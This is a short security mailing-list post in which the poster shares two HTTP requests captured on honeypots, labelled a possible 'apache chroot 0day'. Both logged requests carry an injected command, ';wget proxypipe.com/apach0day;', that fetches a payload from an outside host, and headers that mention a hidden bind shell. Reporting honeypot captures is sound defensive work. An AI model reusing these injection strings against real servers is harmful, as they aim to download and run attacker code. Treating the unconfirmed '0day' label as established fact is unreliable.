PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?


From: Lutz Schildt <ls () lsmooth de>
Date: Tue, 29 Jul 2014 09:05:15 +0200

On 28.07.2014 21:26, Lutz Schildt wrote:
I've seen the same request on one of my honeypots and a second one a few hours later from the same IP:


GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Another one:

GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED

